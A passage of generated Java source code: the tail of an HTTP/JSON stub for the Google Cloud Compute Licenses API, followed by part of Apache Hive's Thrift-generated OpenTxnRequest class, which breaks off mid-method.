ProtoRestSerializer<SetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<SetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody( "globalSetPolicyRequestResource", request.getGlobalSetPolicyRequestResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<Policy>newBuilder() .setDefaultInstance(Policy.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); 
private static final ApiMethodDescriptor< TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsMethodDescriptor = ApiMethodDescriptor .<TestIamPermissionsLicenseRequest, TestPermissionsResponse>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/TestIamPermissions") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<TestIamPermissionsLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{resource}/testIamPermissions", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<TestIamPermissionsLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<TestIamPermissionsLicenseRequest> serializer = ProtoRestSerializer.create(); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody( "testPermissionsRequestResource", request.getTestPermissionsRequestResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<TestPermissionsResponse>newBuilder() .setDefaultInstance(TestPermissionsResponse.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<UpdateLicenseRequest, Operation> updateMethodDescriptor = ApiMethodDescriptor.<UpdateLicenseRequest, Operation>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Update") .setHttpMethod("PATCH") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<UpdateLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{license}", request -> { Map<String, String> fields = new HashMap<>(); 
ProtoRestSerializer<UpdateLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "license", request.getLicense()); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<UpdateLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasRequestId()) { serializer.putQueryParam(fields, "requestId", request.getRequestId()); } if (request.hasUpdateMask()) { serializer.putQueryParam(fields, "updateMask", request.getUpdateMask()); } return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("licenseResource", request.getLicenseResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (UpdateLicenseRequest request, Operation response) -> { StringBuilder opName = new StringBuilder(response.getName()); opName.append(":").append(request.getProject()); return HttpJsonOperationSnapshot.newBuilder() .setName(opName.toString()) .setMetadata(response) .setDone(Status.DONE.equals(response.getStatus())) .setResponse(response) .setError(response.getHttpErrorStatusCode(), response.getHttpErrorMessage()) .build(); }) .build(); private final UnaryCallable<DeleteLicenseRequest, Operation> deleteCallable; private final OperationCallable<DeleteLicenseRequest, Operation, Operation> deleteOperationCallable; private final UnaryCallable<GetLicenseRequest, License> getCallable; private final UnaryCallable<GetIamPolicyLicenseRequest, Policy> getIamPolicyCallable; private final UnaryCallable<InsertLicenseRequest, Operation> insertCallable; private final OperationCallable<InsertLicenseRequest, Operation, Operation> insertOperationCallable; private final UnaryCallable<ListLicensesRequest, LicensesListResponse> 
listCallable; private final UnaryCallable<ListLicensesRequest, ListPagedResponse> listPagedCallable; private final UnaryCallable<SetIamPolicyLicenseRequest, Policy> setIamPolicyCallable; private final UnaryCallable<TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsCallable; private final UnaryCallable<UpdateLicenseRequest, Operation> updateCallable; private final OperationCallable<UpdateLicenseRequest, Operation, Operation> updateOperationCallable; private final BackgroundResource backgroundResources; private final HttpJsonGlobalOperationsStub httpJsonOperationsStub; private final HttpJsonStubCallableFactory callableFactory; public static final HttpJsonLicensesStub create(LicensesStubSettings settings) throws IOException { return new HttpJsonLicensesStub(settings, ClientContext.create(settings)); } public static final HttpJsonLicensesStub create(ClientContext clientContext) throws IOException { return new HttpJsonLicensesStub(LicensesStubSettings.newBuilder().build(), clientContext); } public static final HttpJsonLicensesStub create( ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException { return new HttpJsonLicensesStub( LicensesStubSettings.newBuilder().build(), clientContext, callableFactory); } /** * Constructs an instance of HttpJsonLicensesStub, using the given settings. This is protected so * that it is easy to make a subclass, but otherwise, the static factory methods should be * preferred. */ protected HttpJsonLicensesStub(LicensesStubSettings settings, ClientContext clientContext) throws IOException { this(settings, clientContext, new HttpJsonLicensesCallableFactory()); } /** * Constructs an instance of HttpJsonLicensesStub, using the given settings. This is protected so * that it is easy to make a subclass, but otherwise, the static factory methods should be * preferred. 
*/ protected HttpJsonLicensesStub( LicensesStubSettings settings, ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException { this.callableFactory = callableFactory; this.httpJsonOperationsStub = HttpJsonGlobalOperationsStub.create(clientContext, callableFactory); HttpJsonCallSettings<DeleteLicenseRequest, Operation> deleteTransportSettings = HttpJsonCallSettings.<DeleteLicenseRequest, Operation>newBuilder() .setMethodDescriptor(deleteMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("license", String.valueOf(request.getLicense())); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<GetLicenseRequest, License> getTransportSettings = HttpJsonCallSettings.<GetLicenseRequest, License>newBuilder() .setMethodDescriptor(getMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("license", String.valueOf(request.getLicense())); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<GetIamPolicyLicenseRequest, Policy> getIamPolicyTransportSettings = HttpJsonCallSettings.<GetIamPolicyLicenseRequest, Policy>newBuilder() .setMethodDescriptor(getIamPolicyMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<InsertLicenseRequest, Operation> insertTransportSettings = HttpJsonCallSettings.<InsertLicenseRequest, Operation>newBuilder() .setMethodDescriptor(insertMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> 
{ RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<ListLicensesRequest, LicensesListResponse> listTransportSettings = HttpJsonCallSettings.<ListLicensesRequest, LicensesListResponse>newBuilder() .setMethodDescriptor(listMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<SetIamPolicyLicenseRequest, Policy> setIamPolicyTransportSettings = HttpJsonCallSettings.<SetIamPolicyLicenseRequest, Policy>newBuilder() .setMethodDescriptor(setIamPolicyMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsTransportSettings = HttpJsonCallSettings .<TestIamPermissionsLicenseRequest, TestPermissionsResponse>newBuilder() .setMethodDescriptor(testIamPermissionsMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<UpdateLicenseRequest, Operation> updateTransportSettings = HttpJsonCallSettings.<UpdateLicenseRequest, Operation>newBuilder() .setMethodDescriptor(updateMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("license", 
String.valueOf(request.getLicense())); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); this.deleteCallable = callableFactory.createUnaryCallable( deleteTransportSettings, settings.deleteSettings(), clientContext); this.deleteOperationCallable = callableFactory.createOperationCallable( deleteTransportSettings, settings.deleteOperationSettings(), clientContext, httpJsonOperationsStub); this.getCallable = callableFactory.createUnaryCallable( getTransportSettings, settings.getSettings(), clientContext); this.getIamPolicyCallable = callableFactory.createUnaryCallable( getIamPolicyTransportSettings, settings.getIamPolicySettings(), clientContext); this.insertCallable = callableFactory.createUnaryCallable( insertTransportSettings, settings.insertSettings(), clientContext); this.insertOperationCallable = callableFactory.createOperationCallable( insertTransportSettings, settings.insertOperationSettings(), clientContext, httpJsonOperationsStub); this.listCallable = callableFactory.createUnaryCallable( listTransportSettings, settings.listSettings(), clientContext); this.listPagedCallable = callableFactory.createPagedCallable( listTransportSettings, settings.listSettings(), clientContext); this.setIamPolicyCallable = callableFactory.createUnaryCallable( setIamPolicyTransportSettings, settings.setIamPolicySettings(), clientContext); this.testIamPermissionsCallable = callableFactory.createUnaryCallable( testIamPermissionsTransportSettings, settings.testIamPermissionsSettings(), clientContext); this.updateCallable = callableFactory.createUnaryCallable( updateTransportSettings, settings.updateSettings(), clientContext); this.updateOperationCallable = callableFactory.createOperationCallable( updateTransportSettings, settings.updateOperationSettings(), clientContext, httpJsonOperationsStub); this.backgroundResources = new BackgroundResourceAggregation(clientContext.getBackgroundResources()); } @InternalApi public static 
List<ApiMethodDescriptor> getMethodDescriptors() { List<ApiMethodDescriptor> methodDescriptors = new ArrayList<>(); methodDescriptors.add(deleteMethodDescriptor); methodDescriptors.add(getMethodDescriptor); methodDescriptors.add(getIamPolicyMethodDescriptor); methodDescriptors.add(insertMethodDescriptor); methodDescriptors.add(listMethodDescriptor); methodDescriptors.add(setIamPolicyMethodDescriptor); methodDescriptors.add(testIamPermissionsMethodDescriptor); methodDescriptors.add(updateMethodDescriptor); return methodDescriptors; } @Override public UnaryCallable<DeleteLicenseRequest, Operation> deleteCallable() { return deleteCallable; } @Override public OperationCallable<DeleteLicenseRequest, Operation, Operation> deleteOperationCallable() { return deleteOperationCallable; } @Override public UnaryCallable<GetLicenseRequest, License> getCallable() { return getCallable; } @Override public UnaryCallable<GetIamPolicyLicenseRequest, Policy> getIamPolicyCallable() { return getIamPolicyCallable; } @Override public UnaryCallable<InsertLicenseRequest, Operation> insertCallable() { return insertCallable; } @Override public OperationCallable<InsertLicenseRequest, Operation, Operation> insertOperationCallable() { return insertOperationCallable; } @Override public UnaryCallable<ListLicensesRequest, LicensesListResponse> listCallable() { return listCallable; } @Override public UnaryCallable<ListLicensesRequest, ListPagedResponse> listPagedCallable() { return listPagedCallable; } @Override public UnaryCallable<SetIamPolicyLicenseRequest, Policy> setIamPolicyCallable() { return setIamPolicyCallable; } @Override public UnaryCallable<TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsCallable() { return testIamPermissionsCallable; } @Override public UnaryCallable<UpdateLicenseRequest, Operation> updateCallable() { return updateCallable; } @Override public OperationCallable<UpdateLicenseRequest, Operation, Operation> updateOperationCallable() { return 
updateOperationCallable; } @Override public final void close() { try { backgroundResources.close(); } catch (RuntimeException e) { throw e; } catch (Exception e) { throw new IllegalStateException("Failed to close resource", e); } } @Override public void shutdown() { backgroundResources.shutdown(); } @Override public boolean isShutdown() { return backgroundResources.isShutdown(); } @Override public boolean isTerminated() { return backgroundResources.isTerminated(); } @Override public void shutdownNow() { backgroundResources.shutdownNow(); } @Override public boolean awaitTermination(long duration, TimeUnit unit) throws InterruptedException { return backgroundResources.awaitTermination(duration, unit); } }
apache/hive
35,826
standalone-metastore/metastore-common/src/gen/thrift/gen-javabean/org/apache/hadoop/hive/metastore/api/OpenTxnRequest.java
/** * Autogenerated by Thrift Compiler (0.16.0) * * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING * @generated */ package org.apache.hadoop.hive.metastore.api; @SuppressWarnings({"cast", "rawtypes", "serial", "unchecked", "unused"}) @javax.annotation.Generated(value = "Autogenerated by Thrift Compiler (0.16.0)") @org.apache.hadoop.classification.InterfaceAudience.Public @org.apache.hadoop.classification.InterfaceStability.Stable public class OpenTxnRequest implements org.apache.thrift.TBase<OpenTxnRequest, OpenTxnRequest._Fields>, java.io.Serializable, Cloneable, Comparable<OpenTxnRequest> { private static final org.apache.thrift.protocol.TStruct STRUCT_DESC = new org.apache.thrift.protocol.TStruct("OpenTxnRequest"); private static final org.apache.thrift.protocol.TField NUM_TXNS_FIELD_DESC = new org.apache.thrift.protocol.TField("num_txns", org.apache.thrift.protocol.TType.I32, (short)1); private static final org.apache.thrift.protocol.TField USER_FIELD_DESC = new org.apache.thrift.protocol.TField("user", org.apache.thrift.protocol.TType.STRING, (short)2); private static final org.apache.thrift.protocol.TField HOSTNAME_FIELD_DESC = new org.apache.thrift.protocol.TField("hostname", org.apache.thrift.protocol.TType.STRING, (short)3); private static final org.apache.thrift.protocol.TField AGENT_INFO_FIELD_DESC = new org.apache.thrift.protocol.TField("agentInfo", org.apache.thrift.protocol.TType.STRING, (short)4); private static final org.apache.thrift.protocol.TField REPL_POLICY_FIELD_DESC = new org.apache.thrift.protocol.TField("replPolicy", org.apache.thrift.protocol.TType.STRING, (short)5); private static final org.apache.thrift.protocol.TField REPL_SRC_TXN_IDS_FIELD_DESC = new org.apache.thrift.protocol.TField("replSrcTxnIds", org.apache.thrift.protocol.TType.LIST, (short)6); private static final org.apache.thrift.protocol.TField TXN_TYPE_FIELD_DESC = new org.apache.thrift.protocol.TField("txn_type", org.apache.thrift.protocol.TType.I32, 
(short)7); private static final org.apache.thrift.scheme.SchemeFactory STANDARD_SCHEME_FACTORY = new OpenTxnRequestStandardSchemeFactory(); private static final org.apache.thrift.scheme.SchemeFactory TUPLE_SCHEME_FACTORY = new OpenTxnRequestTupleSchemeFactory(); private int num_txns; // required private @org.apache.thrift.annotation.Nullable java.lang.String user; // required private @org.apache.thrift.annotation.Nullable java.lang.String hostname; // required private @org.apache.thrift.annotation.Nullable java.lang.String agentInfo; // optional private @org.apache.thrift.annotation.Nullable java.lang.String replPolicy; // optional private @org.apache.thrift.annotation.Nullable java.util.List<java.lang.Long> replSrcTxnIds; // optional private @org.apache.thrift.annotation.Nullable TxnType txn_type; // optional /** The set of fields this struct contains, along with convenience methods for finding and manipulating them. */ public enum _Fields implements org.apache.thrift.TFieldIdEnum { NUM_TXNS((short)1, "num_txns"), USER((short)2, "user"), HOSTNAME((short)3, "hostname"), AGENT_INFO((short)4, "agentInfo"), REPL_POLICY((short)5, "replPolicy"), REPL_SRC_TXN_IDS((short)6, "replSrcTxnIds"), /** * * @see TxnType */ TXN_TYPE((short)7, "txn_type"); private static final java.util.Map<java.lang.String, _Fields> byName = new java.util.HashMap<java.lang.String, _Fields>(); static { for (_Fields field : java.util.EnumSet.allOf(_Fields.class)) { byName.put(field.getFieldName(), field); } } /** * Find the _Fields constant that matches fieldId, or null if its not found. 
*/ @org.apache.thrift.annotation.Nullable public static _Fields findByThriftId(int fieldId) { switch(fieldId) { case 1: // NUM_TXNS return NUM_TXNS; case 2: // USER return USER; case 3: // HOSTNAME return HOSTNAME; case 4: // AGENT_INFO return AGENT_INFO; case 5: // REPL_POLICY return REPL_POLICY; case 6: // REPL_SRC_TXN_IDS return REPL_SRC_TXN_IDS; case 7: // TXN_TYPE return TXN_TYPE; default: return null; } } /** * Find the _Fields constant that matches fieldId, throwing an exception * if it is not found. */ public static _Fields findByThriftIdOrThrow(int fieldId) { _Fields fields = findByThriftId(fieldId); if (fields == null) throw new java.lang.IllegalArgumentException("Field " + fieldId + " doesn't exist!"); return fields; } /** * Find the _Fields constant that matches name, or null if its not found. */ @org.apache.thrift.annotation.Nullable public static _Fields findByName(java.lang.String name) { return byName.get(name); } private final short _thriftId; private final java.lang.String _fieldName; _Fields(short thriftId, java.lang.String fieldName) { _thriftId = thriftId; _fieldName = fieldName; } public short getThriftFieldId() { return _thriftId; } public java.lang.String getFieldName() { return _fieldName; } } // isset id assignments private static final int __NUM_TXNS_ISSET_ID = 0; private byte __isset_bitfield = 0; private static final _Fields optionals[] = {_Fields.AGENT_INFO,_Fields.REPL_POLICY,_Fields.REPL_SRC_TXN_IDS,_Fields.TXN_TYPE}; public static final java.util.Map<_Fields, org.apache.thrift.meta_data.FieldMetaData> metaDataMap; static { java.util.Map<_Fields, org.apache.thrift.meta_data.FieldMetaData> tmpMap = new java.util.EnumMap<_Fields, org.apache.thrift.meta_data.FieldMetaData>(_Fields.class); tmpMap.put(_Fields.NUM_TXNS, new org.apache.thrift.meta_data.FieldMetaData("num_txns", org.apache.thrift.TFieldRequirementType.REQUIRED, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.I32))); 
tmpMap.put(_Fields.USER, new org.apache.thrift.meta_data.FieldMetaData("user", org.apache.thrift.TFieldRequirementType.REQUIRED, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.HOSTNAME, new org.apache.thrift.meta_data.FieldMetaData("hostname", org.apache.thrift.TFieldRequirementType.REQUIRED, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.AGENT_INFO, new org.apache.thrift.meta_data.FieldMetaData("agentInfo", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.REPL_POLICY, new org.apache.thrift.meta_data.FieldMetaData("replPolicy", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.REPL_SRC_TXN_IDS, new org.apache.thrift.meta_data.FieldMetaData("replSrcTxnIds", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.ListMetaData(org.apache.thrift.protocol.TType.LIST, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.I64)))); tmpMap.put(_Fields.TXN_TYPE, new org.apache.thrift.meta_data.FieldMetaData("txn_type", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.EnumMetaData(org.apache.thrift.protocol.TType.ENUM, TxnType.class))); metaDataMap = java.util.Collections.unmodifiableMap(tmpMap); org.apache.thrift.meta_data.FieldMetaData.addStructMetaDataMap(OpenTxnRequest.class, metaDataMap); } public OpenTxnRequest() { this.agentInfo = "Unknown"; this.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.DEFAULT; } public OpenTxnRequest( int num_txns, java.lang.String user, java.lang.String hostname) { this(); this.num_txns = num_txns; setNum_txnsIsSet(true); this.user = user; this.hostname = hostname; } /** * Performs a deep 
copy on <i>other</i>. */ public OpenTxnRequest(OpenTxnRequest other) { __isset_bitfield = other.__isset_bitfield; this.num_txns = other.num_txns; if (other.isSetUser()) { this.user = other.user; } if (other.isSetHostname()) { this.hostname = other.hostname; } if (other.isSetAgentInfo()) { this.agentInfo = other.agentInfo; } if (other.isSetReplPolicy()) { this.replPolicy = other.replPolicy; } if (other.isSetReplSrcTxnIds()) { java.util.List<java.lang.Long> __this__replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(other.replSrcTxnIds); this.replSrcTxnIds = __this__replSrcTxnIds; } if (other.isSetTxn_type()) { this.txn_type = other.txn_type; } } public OpenTxnRequest deepCopy() { return new OpenTxnRequest(this); } @Override public void clear() { setNum_txnsIsSet(false); this.num_txns = 0; this.user = null; this.hostname = null; this.agentInfo = "Unknown"; this.replPolicy = null; this.replSrcTxnIds = null; this.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.DEFAULT; } public int getNum_txns() { return this.num_txns; } public void setNum_txns(int num_txns) { this.num_txns = num_txns; setNum_txnsIsSet(true); } public void unsetNum_txns() { __isset_bitfield = org.apache.thrift.EncodingUtils.clearBit(__isset_bitfield, __NUM_TXNS_ISSET_ID); } /** Returns true if field num_txns is set (has been assigned a value) and false otherwise */ public boolean isSetNum_txns() { return org.apache.thrift.EncodingUtils.testBit(__isset_bitfield, __NUM_TXNS_ISSET_ID); } public void setNum_txnsIsSet(boolean value) { __isset_bitfield = org.apache.thrift.EncodingUtils.setBit(__isset_bitfield, __NUM_TXNS_ISSET_ID, value); } @org.apache.thrift.annotation.Nullable public java.lang.String getUser() { return this.user; } public void setUser(@org.apache.thrift.annotation.Nullable java.lang.String user) { this.user = user; } public void unsetUser() { this.user = null; } /** Returns true if field user is set (has been assigned a value) and false otherwise */ public boolean isSetUser() { 
return this.user != null; } public void setUserIsSet(boolean value) { if (!value) { this.user = null; } } @org.apache.thrift.annotation.Nullable public java.lang.String getHostname() { return this.hostname; } public void setHostname(@org.apache.thrift.annotation.Nullable java.lang.String hostname) { this.hostname = hostname; } public void unsetHostname() { this.hostname = null; } /** Returns true if field hostname is set (has been assigned a value) and false otherwise */ public boolean isSetHostname() { return this.hostname != null; } public void setHostnameIsSet(boolean value) { if (!value) { this.hostname = null; } } @org.apache.thrift.annotation.Nullable public java.lang.String getAgentInfo() { return this.agentInfo; } public void setAgentInfo(@org.apache.thrift.annotation.Nullable java.lang.String agentInfo) { this.agentInfo = agentInfo; } public void unsetAgentInfo() { this.agentInfo = null; } /** Returns true if field agentInfo is set (has been assigned a value) and false otherwise */ public boolean isSetAgentInfo() { return this.agentInfo != null; } public void setAgentInfoIsSet(boolean value) { if (!value) { this.agentInfo = null; } } @org.apache.thrift.annotation.Nullable public java.lang.String getReplPolicy() { return this.replPolicy; } public void setReplPolicy(@org.apache.thrift.annotation.Nullable java.lang.String replPolicy) { this.replPolicy = replPolicy; } public void unsetReplPolicy() { this.replPolicy = null; } /** Returns true if field replPolicy is set (has been assigned a value) and false otherwise */ public boolean isSetReplPolicy() { return this.replPolicy != null; } public void setReplPolicyIsSet(boolean value) { if (!value) { this.replPolicy = null; } } public int getReplSrcTxnIdsSize() { return (this.replSrcTxnIds == null) ? 0 : this.replSrcTxnIds.size(); } @org.apache.thrift.annotation.Nullable public java.util.Iterator<java.lang.Long> getReplSrcTxnIdsIterator() { return (this.replSrcTxnIds == null) ? 
null : this.replSrcTxnIds.iterator(); } public void addToReplSrcTxnIds(long elem) { if (this.replSrcTxnIds == null) { this.replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(); } this.replSrcTxnIds.add(elem); } @org.apache.thrift.annotation.Nullable public java.util.List<java.lang.Long> getReplSrcTxnIds() { return this.replSrcTxnIds; } public void setReplSrcTxnIds(@org.apache.thrift.annotation.Nullable java.util.List<java.lang.Long> replSrcTxnIds) { this.replSrcTxnIds = replSrcTxnIds; } public void unsetReplSrcTxnIds() { this.replSrcTxnIds = null; } /** Returns true if field replSrcTxnIds is set (has been assigned a value) and false otherwise */ public boolean isSetReplSrcTxnIds() { return this.replSrcTxnIds != null; } public void setReplSrcTxnIdsIsSet(boolean value) { if (!value) { this.replSrcTxnIds = null; } } /** * * @see TxnType */ @org.apache.thrift.annotation.Nullable public TxnType getTxn_type() { return this.txn_type; } /** * * @see TxnType */ public void setTxn_type(@org.apache.thrift.annotation.Nullable TxnType txn_type) { this.txn_type = txn_type; } public void unsetTxn_type() { this.txn_type = null; } /** Returns true if field txn_type is set (has been assigned a value) and false otherwise */ public boolean isSetTxn_type() { return this.txn_type != null; } public void setTxn_typeIsSet(boolean value) { if (!value) { this.txn_type = null; } } public void setFieldValue(_Fields field, @org.apache.thrift.annotation.Nullable java.lang.Object value) { switch (field) { case NUM_TXNS: if (value == null) { unsetNum_txns(); } else { setNum_txns((java.lang.Integer)value); } break; case USER: if (value == null) { unsetUser(); } else { setUser((java.lang.String)value); } break; case HOSTNAME: if (value == null) { unsetHostname(); } else { setHostname((java.lang.String)value); } break; case AGENT_INFO: if (value == null) { unsetAgentInfo(); } else { setAgentInfo((java.lang.String)value); } break; case REPL_POLICY: if (value == null) { unsetReplPolicy(); } else { 
setReplPolicy((java.lang.String)value); } break; case REPL_SRC_TXN_IDS: if (value == null) { unsetReplSrcTxnIds(); } else { setReplSrcTxnIds((java.util.List<java.lang.Long>)value); } break; case TXN_TYPE: if (value == null) { unsetTxn_type(); } else { setTxn_type((TxnType)value); } break; } } @org.apache.thrift.annotation.Nullable public java.lang.Object getFieldValue(_Fields field) { switch (field) { case NUM_TXNS: return getNum_txns(); case USER: return getUser(); case HOSTNAME: return getHostname(); case AGENT_INFO: return getAgentInfo(); case REPL_POLICY: return getReplPolicy(); case REPL_SRC_TXN_IDS: return getReplSrcTxnIds(); case TXN_TYPE: return getTxn_type(); } throw new java.lang.IllegalStateException(); } /** Returns true if field corresponding to fieldID is set (has been assigned a value) and false otherwise */ public boolean isSet(_Fields field) { if (field == null) { throw new java.lang.IllegalArgumentException(); } switch (field) { case NUM_TXNS: return isSetNum_txns(); case USER: return isSetUser(); case HOSTNAME: return isSetHostname(); case AGENT_INFO: return isSetAgentInfo(); case REPL_POLICY: return isSetReplPolicy(); case REPL_SRC_TXN_IDS: return isSetReplSrcTxnIds(); case TXN_TYPE: return isSetTxn_type(); } throw new java.lang.IllegalStateException(); } @Override public boolean equals(java.lang.Object that) { if (that instanceof OpenTxnRequest) return this.equals((OpenTxnRequest)that); return false; } public boolean equals(OpenTxnRequest that) { if (that == null) return false; if (this == that) return true; boolean this_present_num_txns = true; boolean that_present_num_txns = true; if (this_present_num_txns || that_present_num_txns) { if (!(this_present_num_txns && that_present_num_txns)) return false; if (this.num_txns != that.num_txns) return false; } boolean this_present_user = true && this.isSetUser(); boolean that_present_user = true && that.isSetUser(); if (this_present_user || that_present_user) { if (!(this_present_user && 
that_present_user)) return false; if (!this.user.equals(that.user)) return false; } boolean this_present_hostname = true && this.isSetHostname(); boolean that_present_hostname = true && that.isSetHostname(); if (this_present_hostname || that_present_hostname) { if (!(this_present_hostname && that_present_hostname)) return false; if (!this.hostname.equals(that.hostname)) return false; } boolean this_present_agentInfo = true && this.isSetAgentInfo(); boolean that_present_agentInfo = true && that.isSetAgentInfo(); if (this_present_agentInfo || that_present_agentInfo) { if (!(this_present_agentInfo && that_present_agentInfo)) return false; if (!this.agentInfo.equals(that.agentInfo)) return false; } boolean this_present_replPolicy = true && this.isSetReplPolicy(); boolean that_present_replPolicy = true && that.isSetReplPolicy(); if (this_present_replPolicy || that_present_replPolicy) { if (!(this_present_replPolicy && that_present_replPolicy)) return false; if (!this.replPolicy.equals(that.replPolicy)) return false; } boolean this_present_replSrcTxnIds = true && this.isSetReplSrcTxnIds(); boolean that_present_replSrcTxnIds = true && that.isSetReplSrcTxnIds(); if (this_present_replSrcTxnIds || that_present_replSrcTxnIds) { if (!(this_present_replSrcTxnIds && that_present_replSrcTxnIds)) return false; if (!this.replSrcTxnIds.equals(that.replSrcTxnIds)) return false; } boolean this_present_txn_type = true && this.isSetTxn_type(); boolean that_present_txn_type = true && that.isSetTxn_type(); if (this_present_txn_type || that_present_txn_type) { if (!(this_present_txn_type && that_present_txn_type)) return false; if (!this.txn_type.equals(that.txn_type)) return false; } return true; } @Override public int hashCode() { int hashCode = 1; hashCode = hashCode * 8191 + num_txns; hashCode = hashCode * 8191 + ((isSetUser()) ? 131071 : 524287); if (isSetUser()) hashCode = hashCode * 8191 + user.hashCode(); hashCode = hashCode * 8191 + ((isSetHostname()) ? 
131071 : 524287); if (isSetHostname()) hashCode = hashCode * 8191 + hostname.hashCode(); hashCode = hashCode * 8191 + ((isSetAgentInfo()) ? 131071 : 524287); if (isSetAgentInfo()) hashCode = hashCode * 8191 + agentInfo.hashCode(); hashCode = hashCode * 8191 + ((isSetReplPolicy()) ? 131071 : 524287); if (isSetReplPolicy()) hashCode = hashCode * 8191 + replPolicy.hashCode(); hashCode = hashCode * 8191 + ((isSetReplSrcTxnIds()) ? 131071 : 524287); if (isSetReplSrcTxnIds()) hashCode = hashCode * 8191 + replSrcTxnIds.hashCode(); hashCode = hashCode * 8191 + ((isSetTxn_type()) ? 131071 : 524287); if (isSetTxn_type()) hashCode = hashCode * 8191 + txn_type.getValue(); return hashCode; } @Override public int compareTo(OpenTxnRequest other) { if (!getClass().equals(other.getClass())) { return getClass().getName().compareTo(other.getClass().getName()); } int lastComparison = 0; lastComparison = java.lang.Boolean.compare(isSetNum_txns(), other.isSetNum_txns()); if (lastComparison != 0) { return lastComparison; } if (isSetNum_txns()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.num_txns, other.num_txns); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetUser(), 